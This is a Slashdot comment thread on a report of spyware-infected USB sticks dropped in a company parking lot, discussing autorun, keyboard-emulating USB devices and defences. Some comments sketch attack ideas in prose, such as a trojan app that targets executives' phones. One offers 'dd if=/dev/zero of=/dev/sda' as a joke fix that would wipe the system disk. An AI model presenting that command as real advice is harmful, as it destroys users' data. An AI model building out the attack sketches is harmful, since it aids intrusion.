Criminals Distribute Infected USB Sticks In Parking Lot

New submitter sabri writes "The Dutch news-site Elsevier is reporting that cybercriminals attempted to steal data from a multinational chemicals company by 'losing' spyware-infected USB sticks on the company's parking lot. Their attempt failed as one of the employees who found the stick dropped it off at the company's IT department, who then found the spyware and issued a warning. So next time, don't expect to find someone's dirty pictures on a USB stick you just found..."

Expensive

Sounds expensive just to distribute malware/viruses at say even a few bucks a stick compared to traditional methods like email which proven to be quite effective by the gullible. I just don't see this being common practice though it possible it could be a targeted attack in an attempt to penetrate the company specifically.

Re:Expensive

This will usually bypass all the internet-based filtering and security systems.

Re:Expensive

[shibashaba]

These were targeted specifically though at the one company, greatly increasing the odds of getting into something that they were interested in.

Re:Expensive

[leftbrainstrain]

I haven't heard of this technique actually being used in the wild, but it's enough of a threat to be included in the standard security training everyone has to take for at least a few Fortune 500 companies -- it's why some companies (and the U.S. military, I think) may disable USB ports. Trying to get at potential targets through standard attack vectors may not be effective, so if you have a financial backer this may present a promising attack vector that greedy targets may enable. The book "Security Engineering" cites this web site (had to find via archive.org) where a consulting company found out people inserted the USB sticks under slightly different circumstances: http://web.archive.org/web/20090621014856/http://www.vnunet.com/computing/news/2173365/uk-firms-naive-usb-stick

Re:Expensive

[wierd_w]

Personally, I'd target smartphones.

If I were a malicious programmer out to get corporate dirt, I would release a "perfectly harmless" appstore game or business applet. This applet does not in any way harm the phone, or call home. What I does instead is drop some binaries on the root of the internal sdcard or flash memory storage device to mimic this attack.

This has several advantages:

1) you can update your penetration package as part of an app update, which the user won't catch.

2) you can target a device frequently demanded to be added to device exception lists, such as corporate CEOs insisting their iBone be able to sync their corporate email.

This gives you a mostly unprotected path to the mailserver if the package delivery mechanism is done right.

In the case of android phones at least, you can control how the device talks to the computer, and what HID classes it wants. This could let the phone operate as a hardware keylogger, etc.

Seriously, smartphones are a torpedo.

Re:Expensive

[GumphMaster]

In certain military environments I worked in the USB, Firewire, and microphone ports were immediately filled with epoxy and (where possible) disconnected from the motherboard.

Re:Expensive

[wvmarle]

I thought disabling USB ports (and related such as firewire), cameras, microphones was primarily to prevent data from leaking OUT of the company.

Re:Expensive

Yes, but with Linux you could mount the filesystem noexec and the malware writer would have to figure out how to get it to execute in order to undo the restriction. Which is a substantially harder thing than figuring out how to get it to autorun. Any idiot that's running strange programs from found USB drives deserves whatever malware he gets.

Re:Expensive

[phantomfive]

I'm curious, how would you go about getting a CEO to install an App on his phone? I'm guessing your app isn't going to be very popular (because otherwise you would just make money from advertising, instead of stupid illegal stuff....and if it does get popular, someone will notice it dropping random files on the SDcard).

So are you going to send him an email to try out your app? He'll ignore it. What are you going to do?

Re:Expensive

[ark1]

Depends on your assets. As we saw with stuxnet, compromising integrity of systems was the primary objective.

Re:Expensive

[jroysdon]

We disable for inbound access. All smartphones have Internet access, no? Great way to reverse-tether and get into our network.

Re:Expensive

[davydagger]

not really. at $5 a stick, 10 would be $50 which should be more than enough.

its actually not a bad idea from an attacker's perspective. Very supprised this company has good employees that can spot things like this.

Most cases of malware infection come from stupid decisions made by non-tech people. Good sense to avoid crap like this isn't hard or obtrusive, it just requires that people merely pay attention and think on their feet, and some basic awareness.

that would stop 75% of all malware, found in parking lots or not.

Re:Expensive

[davydagger]

who says the attacker is intrested soley in money?

mabey just the thrill of it, mabey idealogical goals, mabey revenge, mabey power through blackmail, or some form of leverage.

Re:Expensive

[wierd_w]

Its simple.

You do both.

You don't drop the payload indescriminantly. You make use of the fact that nearly every android applet has over-extended priviledges to begin with, and request access to contact list and sdcard the sae as just about every other free app. You go ahead and make a nice and well polished app, then only drop the payload on specific phones, by checking for some criteria. You want this to be just a handful of very high profile people, not joe schlubb.

While I admit you probably won't have "angry birds" level on your install base, you could probably draw a nice one if you made a very nice and attractive app that caters to corporate types.

Your payload depostion routine would be selective, using the phone's phonebook to get the phone number for the device, and checking that internally to see if its on the app's hitlist.

If it is, it activates the malware. If not, enjoy the ad supported app.

With the degree of information proliferation, things like private cell numbers are considerably less private. Engineering such an attack is more patience than anything else. You could even make it look like you were a victim of a hack yourself as a cover.

Re:Expensive

[InspectorGadget1964]

A properly coded operating system would not execute an unknown application without firs asking the user. Furthermore, a correctly build operating system would not allowed applications executed by an unprivileged user to gain control of the operating system. As you see your comments lack validity. As far as the website you mentioned, that advice will only work with systems that have been badly configured with the intention of allowing an intruder to penetrate them. I suggest you get familiar with real operating systems and stop playing with what in the computer world qualifies as “toddler operating systems” that lack strength and maturity to operate in an unprotected environment.

Re:Expensive

[AHuxley]

Map out the bus stops and have a car with some form of smartphone box reaching out to all that pass by.
Think back to the Bluetooth efforts with a properly tuned antenna. A few seconds to test for a new, old and very open phone.

Re:Expensive

dud example

There are no examples, and the "5 easy steps" from the linked page haven't worked for years.

One of the reasons Linux is more secure is that the community responds far more quickly to potential threats.

Hairyfeet always gets to +5 with votes from the Apple/Windows crowd here, but he's never been able to show a single current instance of actual Linux malware in the wild. Much like the 235 patents, it's always threats from the future or the past.

Re:Expensive

Of course on a properly managed system, also on Windows, such a USB stick will do nothing.

Re:Expensive

[Hognoxious]

I thought I'd seen something like it before.

5 years before, it would seem. Way to go, slashdot!

Re:Expensive

[Tom]

I know that taking away the mouse and keyboard dramatically reduces the number of user mistakes, but I do wonder if this isn't taking it a little too far.

Re:Expensive

[Tom]

Personally, I'd target smartphones.

Which is why every company with a serious interest in security has a smartphone policy and has had it for a while. A company I know about but can't drop names, which is part of the supply chain you need to build nuclear bombs, has one specific type of carefully screened smartphone that they issue to employees, no other phones (smart or not) are allowed on company grounds, camera and other parts are disabled in hardware and software installs are tightly controlled. Encryption and remote-wipe as well as an automatic wipe if it can't phone home for a certain time are in the package as well. No, the CEO is not excluded from this policy.

Re:Expensive

[hlavac]

Of course on a properly managed system, also on Windows, such a USB stick will do nothing.

Because all the USB ports are filled with glue.

Re:Expensive

[TheRaven64]

noexec only disables things that the kernel runs directly. It doesn't disable scripts if you invoke them via the correct command interpreter and it certainly doesn't protect you against, for example, a libpng or libjpeg exploit and a malicious image.

Re:Expensive

[Culture20]

Just use a known tiff, jpeg, or png vulnerability. There are plenty of Linux systems that people don't upgrade controlling scientific equipment, and sneakernet is the only way to transfer files to them if they're disconnected from the 'net. If it's running a GUI, just making a thumbnail for a folder view could be enough to activate the payload.

Re:Expensive

[leonardluen]

we only heard about the sticks that were caught, not how many others actually got plugged in to a company computer.

Re:Expensive

[flappinbooger]

Sounds expensive just to distribute malware/viruses at say even a few bucks a stick compared to traditional methods like email which proven to be quite effective by the gullible. I just don't see this being common practice though it possible it could be a targeted attack in an attempt to penetrate the company specifically.

CD-Rs with something intriguing sharpied on the front would be a lot cheaper that's for sure. The cheapest flash drives are maybe what, $3? $2? CDr can be had for cents. A malware campaign using this tactic would only use USB flash if they were zeroed in on the target(s) or as someone else said if they had gov't level funding.

A sow-them-to-the-wind campaign would rather use CDr I would think.

Any pen testers out there that can attest to this?

Re:Expensive

[slashping]

A CD-R might be considered more suspicious. They don't typically fall out of somebody's pocket while they grab their car keys.

Re:Expensive

[zoloto]

No, because the usb port will fail to load anything but keyboard and mouse drivers per Active Directory .adm rules.

Noob

Re:Expensive

[Fatch+Racall]

Except that, even though at my company the Active Directory .adm rules disable USB storage devices, there's still a lag time between plugging it in and having it disabled. I was able to pull a few files off a USB flash drive in that time, easy as pie.

Re:Expensive

[ultranova]

No, because the usb port will fail to load anything but keyboard and mouse drivers per Active Directory .adm rules.

Having a USB device pose as a keyboard and thus able to send keypresses could still be a security threat. Granted, it's not quite as efficient as two-way communications, but could still cause quite a bit of damage.

The parent has a point: if you don't want people plugging in USB devices, just physically disable the ports.

Re:Expensive

[DocSavage64109]

The parent has a point: if you don't want people plugging in USB devices, just physically disable the ports.

That only works on machines that still have ps2 ports. Plenty of machines don't have them now days.

Re:Expensive

[Feyshtey]

If your goal is to steal the company's trade secrets this is a microscopic investment for a potential cash windfall.

Re:Expensive

[LWATCDR]

Understandable but a major pain in the rear. For example I used to use a USB drive that I just kept plugged into the back of my PC as an extra back up. Sure I put it on the network and the network drive was backed up but the USB drive was just one more backup just in case. I also kept a USB drive with me that I used as a back up.
In some cases security must trump convenience but what a pain.

Of course some places use USB drives as part of the security. That is how they move data from their networked systems to their air gapped secure systems.

Re:Expensive

[danomac]

Probably PS/2 keyboard/mouse. It's getting harder to find boards with those ports now, wonder what they do now?

Re:Expensive

[marcosdumay]

No problem. Just make sticks that act as keyboards and, once installed, download and run your malware.

Re:Expensive

[mcgrew]

CDrs are a lot more fragile than USB sticks. Throw a CD out of your car window and see if it still plays.

Re:Expensive

[greenfruitsalad]

like this one? http://hakshop.myshopify.com/products/usb-rubber-ducky

Re:Expensive

[GumphMaster]

At the time mouse and keyboard used those Oh-so-retro DIN connectors. I guess the modern equivalent would involve gluing the keyboard and mouse USB plugs into the sockets although that's a bit of a maintenance headache, although arguably still cheaper than the loss of the information. I didn't notice a particular decline in carbon-based failure rate ;)

Re:Expensive

[Tom]

Nope, it's not the same. Security, wise, it is much cheaper. Cutting the cable and splicing it into my custom USB device is not trivial, but possible. If I cut at the right point, I could possibly even re-attach it to the keyboard so it will pass casual inspection.

Re:Expensive

[zoloto]

Then they're doing it wrong.

Re:Expensive

[Marxist+Hacker+42]

Not too terribly expensive. You don't exactly have to have a high capacity stick to do this- looks like you can pick up 32MB sticks for approximately 89 cents each in bulk and that's enough to put a "phone home and FTP up a hard drive" application on autorun under a cute cat video.

Thats what virtual machines are for.

[Kenja]

So you can load USB sticks you find and extract the pictures!

Re:Thats what virtual machines are for.

No, that's what operating systems that don't automatically run any executable that happens to appear are for.

Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

Re:Thats what virtual machines are for.

[Anaerin]

Just because it looks like a memory stick, doesn't mean it actually is one. Put a microcontroller in there with a USBHID type program and you've got a keylogger, or some other remote access system just waiting to be triggered.

Re:Thats what virtual machines are for.

[Johann+Lau]

The human body either digests or kills anything that's not marked as belonging to the body. It does allow stuff on it's surface and in the lining of the stomach I guess, but other than that, it seems to shoot first and asks questions later. Of course it can be tricked or overwhelmed, but it's not nearly as laid back as you seem to think. (Which can lead to horrible conditions where some body cells aren't recognized for some reason, and mercilessly attacked.)

The human body = mean ass motherfucker. Don't even fucking look at the guy, or he will travel back in time and drop your parents before they can meet.

Computers and operating systems, definately consumer ones = uhm... Ralph Wiggum? Yeah, that seems about right :P

Re:Thats what virtual machines are for.

[InspectorGadget1964]

Well, any MS OS will do it.....

Re:Thats what virtual machines are for.

[slazzy]

This is a good analogy, our bodies even have false positives, they are called "auto immune diseases" when the body attacks itself.

Re:Thats what virtual machines are for.

[Johann+Lau]

Yeah, that's what I was thinking of, but the term escaped me; thanks. They may be rare, but when they occur, oh boy :(

Re:Thats what virtual machines are for.

[gman003]

Why bother with virtuals?

I have a "shitbox" I would use for this. The intent is that it is disposable - both hardware and data. In my case, it's an old, beige Athlon 900 desktop with a fading Windows ME sticker still on it. I've slapped all my old hard drives and OpenBSD on it.

I use it mainly for trying out server shit. Learned how to set up Samba and Apache on it. Tried out several other things, as well.

The only data on it are some SNES ROMs, tertiary backups of non-secret data (source code for various personal shit, it's all stored in two other places), and a rather large collection of porn. I wouldn't really be mad if it all disappeared (even the porn - it means I have an excuse to go smut-hunting again).

So between "even if the virus literally makes it explode, I don't give a shit" and "it's Open-fucking-BSD, who in their right mind would try to write a virus for it?", I would be fully confident plugging a random USB drive into it. More confident than on a virtual, even - what if it connects to the host machine instead, by accident?

Re:Thats what virtual machines are for.

[tchuladdiass]

Even better is if it is a Firewire device -- from what I've read, Firewire gives all kinds of direct memory access to stuff plugged into it (it is a system level bus). Even more so for PC-card (pcmcia) devices.

Re:Thats what virtual machines are for.

We had a couple turn out in our parking lot that when plugged in showed up as a hub that was connected to a usb drive, cd drive and a keyboard. The last one was tricky. After being plugged in, it would install the devices one by one and try to run them, if that didn't work, it registered as a keyboard and tried to put the input of windows key+r then iexplore websiteURL. That last one took me by surpise, as I'd never seen it before.

Re:Thats what virtual machines are for.

[dryeo]

The quadrillion bacteria happily living in your guts would disagree, and depending on the type of their population they'll even change your behaviour.
http://www.sciencedaily.com/releases/2011/05/110517110315.htm

Re:Thats what virtual machines are for.

[JDG1980]

Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

Not idiotic, just outdated. When Windows XP was released, way back in 2001, the assumption was that removable media was going to be a pressed CD or DVD and that these sources could be trusted. This assumption started to break down with the advent of cheap CD/DVD writers, and became completely absurd when inexpensive flash drives proliferated.

As a result, Microsoft removed Autorun from USB drives as part of a Windows XP update in 2011. (Probably a bit late, but still, they did fix it.) On Windows 7, Autorun for USB drives was never included. The user would have to run the malware manually (and if it wants admin permissions, you'd also have to click through the UAC warning).

Re:Thats what virtual machines are for.

[LordLimecat]

Because virtuals have snapshots, whereas physical boxes do not.

Re:Thats what virtual machines are for.

[Barbarian]

Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

Not idiotic, just outdated. When Windows XP was released, way back in 2001, the assumption was that removable media was going to be a pressed CD or DVD and that these sources could be trusted. This assumption started to break down with the advent of cheap CD/DVD writers, and became completely absurd when inexpensive flash drives proliferated.

Autorun comes from Windows 95. Worth noting that cd writers were pretty cheap in 1998.

Re:Thats what virtual machines are for.

[colinrichardday]

Can a keylogger work if it's mounted read only? How would it get the data?

Re:Thats what virtual machines are for.

[Anaerin]

How, precisely, do you mount a keyboard as read-only? Because that's what the micro-controller I'm proposing will look like to the system. It'd appear as a memory stick and a keyboard or a mouse or some other kind of interface device.

Re:Thats what virtual machines are for.

[sqlrob]

He's not saying the software on the stick is a keylogger. He's saying the stick itself is a keylogger. Just because it looks like a flash drive doesn't mean it is one.

Re:Thats what virtual machines are for.

[GoodNewsJimDotCom]

I think an executable would be fine. I think executables would be what lets Linux take off in the market more.

The key is: Do not let an executable change data in any directory other than where it is installed. This way it can't change the system boot sector! It can't even change your sims baby cats edition.

You could turn Windows into a solid security machine if you just did that. People would start downloading junk they find off the internet and liking it.

Re:Thats what virtual machines are for.

[colinrichardday]

mount /dev/usb -ro /media/fake_keyboard Does it matter what it looks like to the system?

Re:Thats what virtual machines are for.

[colinrichardday]

And If I mount the stick read-only, how does the keylogger get data?

mount /dev/usb -ro /media/fake_keyboard

Re:Thats what virtual machines are for.

[pe1chl]

When an office system executes programs from an external USB stick, it is just badly managed by the IT department.

In fact, Windows offers more control over features like this (via group policy) than most other systems.

Re:Thats what virtual machines are for.

[pe1chl]

On a properly managed company system, the administrator has turned off the possibility to run executables from removable media.
Easy.

Re:Thats what virtual machines are for.

[ravenshrike]

It's not lupus.

Re:Thats what virtual machines are for.

[Johann+Lau]

The quadrillion bacteria happily living in your guts would disagree

With what? With "does allow stuff [..] in the lining of the stomach", for example? :P

Re:Thats what virtual machines are for.

[slashping]

No. If you plug in such a USB device, it will only get the traffic designated for it, and it won't see the traffic for your keyboard or mouse.

Re:Thats what virtual machines are for.

[Robert+Zenz]

So, it's the fault of Ford that we have driving schools?

Re:Thats what virtual machines are for.

[fatphil]

Autorun.inf? Windows 95, IIRC. Or, to answer the question as asked, "pretty idiotic". They viewed it as "user friendly", of course.

You had to go out of your way if you wanted the same behaviour on MacOS or OSX, but they did mount the volumes automatically. Linux mostly avoided the idiotic behaviour too, but I seem to remember some versions of Ubuntu had it for a while. I suspect I didn't say a positive word about the distribution for many years after that incident - anyone stupid enough to make a decision like that simply cannot be trusted to make any decision.

Re:Thats what virtual machines are for.

[slashping]

The question is: Can an USB device snoop on other devices traffic?

No, it can't. The upstream hub only sends data to a port that's destined for the attached device. I've seen some hubs also "broadcast" some setup packets, but they wouldn't have any useful information. The only exception would be if the device is a USB hub, which naturally has to pass through all the traffic for the attached devices.

Re:Thats what virtual machines are for.

[fatphil]

What's this "mounting" you're talking about?

Do you "mount" your network card? Nope, but it still manages to pass packets in and out of your machine.

Do you "mount" your monitor? Nope, but it still manages to grab the data in your framebuffer and display it.

Why on earth do you think you'd need to "mount" a USB sniffer?

Re:Thats what virtual machines are for.

[colinrichardday]

chmod a-w /dev/usb?

Re:Thats what virtual machines are for.

[Anaerin]

You're still thinking software running on the system. This would be a piece of HARDWARE. You plug it into a USB port and the system sees it as a physical keyboard. It then logs keystrokes in it's internal memory. Or it sends key presses to the system to take it over, as you would do with a regular keyboard. There's no way to "mount" a keyboard as read-only. And the microcontroller could easily see what operating system it's connected to, and thus customize it's sent keypresses to attack based on the operating system it's plugged into.

Re:Thats what virtual machines are for.

[colinrichardday]

What about chmod a-w /dev/usb? Does Linux allow for greater paranoia in this regard than Windows?

Re:Thats what virtual machines are for.

[Johann+Lau]

The post I replied to was talking about the human body, in contrast to machines. I didn't imply the human body is special in that regard, so huh? Also, what's so special about mammals? :P

Or just browse the thing while running Linux

[the_humeister]

Or turn off auto-run in Windows. I once found a USB drive on the ground. Turns out it was some grad student's drive. I tried to return it but got no response from the email I found on his resume.

Re:Or just browse the thing while running Linux

[ArchieBunker]

Actually auto run is no longer turned on by default in windows. XP had an update that disabled it.

Re:Or just browse the thing while running Linux

[davidwr]

Actually auto run is no longer turned on by default in windows. XP had an update that disabled it.

I ran a homebrew fix manually long before Microsoft issued their patch:

# dd if=/dev/zero of=/dev/sda

Re:Or just browse the thing while running Linux

I tried that and it broke my perfectly usable OS. I tried installing linux but found it to be a piece of shit sometimes.

Re:Or just browse the thing while running Linux

[Hognoxious]

Those do exist. I bought one and it was preinstalled with malware.

I hadn't disabled CD autorun because the machine didn't have a CD drive!

Re:Or just browse the thing while running Linux

[bejiitas_wrath]

I remember an old version of Red Hat Linux that had autorun enabled by default. No longer of course.

Re:Or just browse the thing while running Linux

[virgnarus]

I'm perplexed; why is this marked funny?

Re:Or just browse the thing while running Linux

[antdude]

One day, there will be one designed for Linux/UNIX. Or maybe it exists already?

just mount it in Linux

[awollabe]

and laugh at the windows auto-loader files they tried to get you with.

Seriously, I found a "trick" USB stick in my work mailbox once, which turned out to be a test from our IT department that, if you loaded it (in Windows), would direct you to an obligatory computer security training program. After I called them about it, they let me keep it.

Re:just mount it in Linux

[mlts]

USB sticks can present themselves to the computer as more than just removable hard disks. I've seen some that will act as keyboards and when plugged into Windows, will automatically try to type things in.

If the USB device can present itself as the right item, it can potentially do more damage than "just" a drive or filesystem with malware on it.

Re:just mount it in Linux

[bill_mcgonigle]

If the USB device can present itself as the right item, it can potentially do more damage than "just" a drive or filesystem with malware on it.

I forget the exact mode of attack, but some will nudge the mouse a pixel or two every minute or so to prevent the screensaver from kicking on, and then after some period of user inactivity will begin doing the nefarious bits. I suppose it's easy to kick off a cmd shell from that point and script the attack.

I'd imagine the non-mouse/keyboard part of the "drive" is baited with good porn or addictive games to encourage its continued presence. Anyway, you can scan it all you want, the drive is clean.

Re:just mount it in Linux

I've built one of these, it is surprisingly easy to get certain parts of it built without much in the way of tools or starting knowledge.

In my case it was just a proof of concept type thing to learn HOW to do it, but it would be fairly easy to make one do horrible things...

Then again... Random text strings are fun. Whenever a certain nickname was typed the phrase "loves the cock" would quickly follow. Immature for sure, but hilaaarious to use at lan parties ;)

Or the mouse-jerker.... Those counter-strike playing screaming 14 year olds went fucking meeeental when they kept missing sniper shots *cough*

Re:just mount it in Linux

[rastos1]

I've seen some that will act as keyboards ...

Can we then get something like CONFIG_USB_KEYBOARD option in Linux kernel, please?

Re:just mount it in Linux

[marcosdumay]

Why? Then it'll look like a network card, or a GPU, or a mouse, or watever else.

Linux is missing a "Here, those are the devices that should connect. Besides those, only accept X", where X defaults to hard disks, but you can change to anything that fits you.

Re:just mount it in Linux

[mlts]

It would be nice to have a parameter that would allow/deny USB device requests on what port they are plugged into. That way, I can have a USB card where if a device doesn't register as a mass storage device, it doesn't register at all, while the ports on the machine itself will allow keyboards, mice, etc. to connect normally.

Another idea would be allowing devices to be "paired", where for the OS to officially recognize a keyboard or mouse, it would pop up a dialog asking the user to type in an 8 digit code, or click "ignore" if the message is in error. Similar with a mouse and clicking a short sequence of buttons with the just inserted device. That way, a device posing as a HID that shouldn't be one will be detected quite easily.

Cool, free thumb drive!

[toygeek]

dd if=/dev/zero of=/dev/[usbdrive]

voila, free thumb drive, malware free.

Re:Cool, free thumb drive!

[mug+funky]

that will likely bugger the drive up completely. some flash drives get written past the end or some crap like that.

long story short, i tried this on a thumb drive that reported 8 gigs and was actually 4 gigs... after running dd it was completely useless and unrecoverable, at least by someone of my level of proficiency. YMMV

Re:Cool, free thumb drive!

[drooling-dog]

Heh heh... For Linux I do this routinely to get rid of the manufacturer's crapware, but every time I mount it on my GF's WinXP box it actually has to pause so it can download and reinstall it. WTF?

Re:Cool, free thumb drive!

[hawguy]

dd if=/dev/zero of=/dev/[usbdrive]

voila, free thumb drive, malware free.

Not if the drive has firmware that detects if it's plugged into a Windows host. For non-windows, it acts as a normal flash drive, but if you plug it into Windows, then it exposes the virus. So you take it home, load it up with MP3's from your linux computer and everything is fine, but then when you give it to your wife and she see a filenamed "naked_secretary.exe", she runs it and gets infected.

Re:Cool, free thumb drive!

[mark-t]

After executing 'dd', you still need to run mkfs on the device that holds the filesystem, or else all you have is a blanked drive. Don't forget to use "-t vfat" as an option to mkfs, or else you won't be able to use it anywhere but in Linux.

Re:Cool, free thumb drive!

[k(wi)r(kipedia)]

Not if the drive has firmware that detects if it's plugged into a Windows host.

Interesting. But can Linux detect the presence of the firmware, which presumably has to send some sort of message down the USB bus? My closest experience to this is with a combo USB 3G modem and flash drive.

To handle such devices under Linux, there's a program called USB modeswitch. From the package description:

Mode switching tool for controlling "flip flop" USB devices

Several new USB devices have their proprietary Windows drivers onboard, especially WAN dongles. When plugged in for the first time, they act like a flash storage and start installing the driver from there. If the driver is already installed, the storage device vanishes and a new device, such as an USB modem, shows up. This is called the "ZeroCD" feature.

On Debian, this is not needed, since the driver is included as a Linux kernel module, such as "usbserial". However, the device still shows up as "usb-storage" by default. usb-modeswitch solves that issue by sending the command which actually performs the switching of the device from "usb-storage" to "usbserial".

Re:Cool, free thumb drive!

[v1]

the really annoying ones are the drives that present TWO storage devices. One usually contains drivers, or a small partition with the security software to properly mount the second protected device.

Those are usually NOT separate partitions, they're separate DEVICES and thus a dump from DD doesn't get them both. The other one is usually permanently write-protected also, tho there can be ways to get around that sometimes if you know how.

Re:Cool, free thumb drive!

[davidwr]

The other one is usually permanently write-protected also, tho there can be ways to get around that sometimes if you know how.

If there are ways to get around the "permanent" write-protection, then it's not permanent.

Speaking of which, I wish every memory-storage device had a write-lock that was actually enforced in hardware or at least enforced by immutable firmware, much like the write-lot tabs on floppy drives used to be enforced in hardware. Why? So I could have a 100% guarantee that if I put my memory card or USB stick in a device with the tab engaged, none of the bits on the stick would change at all, no matter what the operating system or software on the host computer was trying to do.

Re:Cool, free thumb drive!

[fermion]

As long as your computer does not autoexecute the USB drive, there is no problem. Of course, on many machines the USB does execute automatically, and it seems if the IT department lets that behavior stand, the responsibility cannot be with the user, but with the IT people.

Re:Cool, free thumb drive!

Unless the malware is actually located in the drive's firmware.

(Recall: people on ebay have been scammed when buying portable hard drives that turned out to be nothing more than firmware-hacked thumb drives and metal weights to make them feel like they contain a real hard drive.)

Re:Cool, free thumb drive!

[Compaqt]

This. Kingston DataTraveller used to have this, but the new ones don't.

Re:Cool, free thumb drive!

The USB device just needs to look for typical access patterns to determine what kind of system it's plugged into. It can look like a completely normal USB mass storage device to both systems, just with a different payload depending on the way it's accessed by the host.

A USB thumb drive isn't limited to being a USB mass storage device either. It could pose as a keyboard and send key sequences to open a shell and send files to a server on the internet.

This just goes to show that Linux isn't immune against user stupidity either. Where Windows users are ignorant, Linux users are smug, and that makes them just as vulnerable.

Re:Cool, free thumb drive!

[fatphil]

Why did you bother running dd anyway? If you're going to run (presumably fdisk and) mkfs, then who cares how "evil" any other bytes are on the device, those bytes won't be in any files, they can't harm you.

Re:Cool, free thumb drive!

[v1]

A pc tech friend of mine had one of these, he'd put his anti-malware software on it and then lock it before attaching to any infected computer. Good way to keep your flash drive and its tools from getting infected.

And on a side-note... the slide lock on SD cards, it's ornamental only. I was surprised to find this out. I put a different firmware on a card and tried to boot my camera from it, and it refused to boot. After some digging I found out that I had to LOCK it for it to boot. Now, what good is a locked SD card in a camera? Didn't matter. The alternate software booted and I was able to take pictures (which were written to the card) no problem. The slide lock appears to only be a physical slide with no electrical contacts in the card to disable write, and relies on the camera to enforce the lock, I assume the camera has a physical reader in the card slot to detect position. So don't rely on locking the card, because it's entirely up to the camera as to whether or not it's actually read-only.

I'm surprised more usb flash drives don't feature lock switches. Even a little micro slide switch accessible through a small slot in the outer shell would be fine. Or even a micro slide inside the usb port. (I have a really small micro sd to usb adapter here that the micro sd card inserts NOT in the back of the little unit, but in the open end of the usb connector, where the flat part usually is, so there is a possibility there)

Re:Cool, free thumb drive!

[mark-t]

Tell that to the makers of mkdosfs

Re:Cool, free thumb drive!

[davidwr]

I use a card-reader and a camera card as my anti-virus tool.

Yes, it MAY be possible for a computer to override this if the lock isn't enforced by the card-reader, but how likely is it that a given virus will include such code?

When I'm that concerned, I use a bootable CD for the first stage of disinfection.

Re:Cool, free thumb drive!

[marcosdumay]

Because there are a couple of sectors that are still read by the OS, but aren't changed by mkfs.

Now, he doens't need to run it over the entire device.

Re:Cool, free thumb drive!

[fatphil]

The sectors written by fdisk?

Re:Cool, free thumb drive!

[marcosdumay]

Yep, written by fdisk and grub.

It just seems easier to blank them.

Re:Cool, free thumb drive!

[mark-t]

If mkdosfs infringes on patents, that's the problem of the makers of mkdosfs, not the users of the utility.

Re:Cool, free thumb drive!

[ZarelTgr]

Ah yes, like those Sandisk Cruzer devices with the U3 partition that you had to go through several hoops to get the software (Windows only) that would nuke that damn thing and return the drive to a single partition... Those drives were so popular with a group I was with, that I put the removal software in our internal toolkit page. Popular download, especially when a couple weeks later, it was no longer available on the Sandisk website (or got moved somewhere that nobody could figure out how to get to) but the drives were still being widely sold. Perhaps they still are? Haven't checked lately... a bit overpriced.

Re:Cool, free thumb drive!

[mark-t]

Actually, I went searching for some info on those patents, and just found this". Seems it has been a non-issue for the past 3 years.

Re:Cool, free thumb drive!

[v1]

yup, that U3 is the most common offender I've seen

Re:Cool, free thumb drive!

[Zanadou]

"naked_secretary.exe"

Hey, that's the combination on my luggage!

Tag: Not News

[Jerslan]

Seriously, how did this get past the fire-hose? This isn't a new idea, practice, or form of attack. It's actually many many years old (likely dating back to the days of floppy disks). Most company Security and/or IT policies state that you should bring found USB Drives to Security and/or IT, and expressly forbid just plugging them into a company computer on the company network. I have no idea how anyone at Slashdot would have found this remotely news-worthy.

Re:Tag: Not News

[l0ungeb0y]

Because it's an example of something going the way it's *should* go instead of the way it usually goes -- with the end user infecting their entire corporate network in a single bone headed "ooh goodie!" moment.

Re:Tag: Not News

[hairyfeet]

Because sadly users seem to forget that what works in tech A can work just as well with tech B and have to be re-educated all over?

I've had to deal with this in the shop, what with so many switching to smartphones lately and wrote about it in my journal here. basically those same "Hey you won a $1000 gift card" emails that haven't worked in regular emails in years work just fine when it comes to smartphones. Its like people just don't connect one to the other and so really OLD tricks work on them when given with new tech. This is why I think phone malware is gonna explode, the same people that wouldn't install a program on their Windows PC from just anywhere will happily do so to be given " free Angry Birds!" so all you can do is try to warn them as best you can.

Re:Tag: Not News

[Jerslan]

Yeah, but this probably happens every day somewhere in the world.

Re:Tag: Not News

[Jerslan]

The smartphone SMS spam might be relevant (though your average Slashdotter should know better anyways).

Regardless of what users seem to think, people *here* should already know better. This *could* be considered newsworthy somewhere that the target demographic may not know this already. Slashdot's target demographic (somewhat tech-literate people) should know better regardless.

Re:Tag: Not News

[hairyfeet]

Yes but who has to SUPPORT the targeted demographic? that would be us. Did i think about anybody that actually reads /. falling for the SMS spam when i wrote in my journal? Nope but I know that many here are admins and when dealing with clueless users its nice to know what is going down, hence the journal.

In the end we geeks sometimes just don't see what is coming because we wouldn't ever fall for it and naturally assume or users wouldn't fall for something so obvious either. Well I can tell you that from working with average folks fixing and selling PCs since the days of Win 3.x that for every 1 that would turn the stick in 100+ would happily pop it in to a PC just to see what is on it. Curiosity is a natural human condition and we need to warn our users that it can be an attack vector just as much as email or SMS.

Re:why would you run something from it?

[mug+funky]

what if it had been raining?

Re:why would you run something from it?

[YukariHirai]

Well, with how malware works and how Windows autorun works, they wouldn't need to deliberately run it, just mount it. As for why someone would pick it up and mount it, I expect the malware distributors here were operating on the assumption that anyone who found a USB stick in a parking lot would assume that someone else at the company dropped it when they were getting their car keys out of their pocket or something, and would therefore probably be safe.

Re:why would you run something from it?

[hawguy]

what if it had been raining?

The flash drives would have been wet, yet fully functional after they dried?

I've washed more than one flash drive and they still worked - I'm using one now that was washed over a year ago. I ran one through the driver once, and after I broke off the melted and mishapen plastic, I plugged it in and it worked.

This is discussed in...

[Darth_brooks]

This technique is discussed in "Metasploit - The penetration testers guide" ( http://shop.oreilly.com/product/9781593272883.do )

Excellent book by the way. After reading it, you'll never look at computer security the same way again, and may very well just switch to an Abacus with a box of crayons on top.

Re:This is discussed in...

[Overzeetop]

I'm afraid our accounting and marketing departments are already using that level of technology, or at least it would seem so based on their output.

Self-reporting

[Gothmolly]

How many times did this work and we DONT hear about it, in cases where people did NOT take it to their IT department?

Re:Self-reporting

[bloodhawk]

probably thousands of times, this is a very very old form of attack that has been commonly documented and used dating all the way back to the floppy disk. Most IT departments have policies specifically around found disks and media for this exact reason. Why one such failed attempts warrants a front page article is the real mystery here.

Re:Self-reporting

[nojayuk]

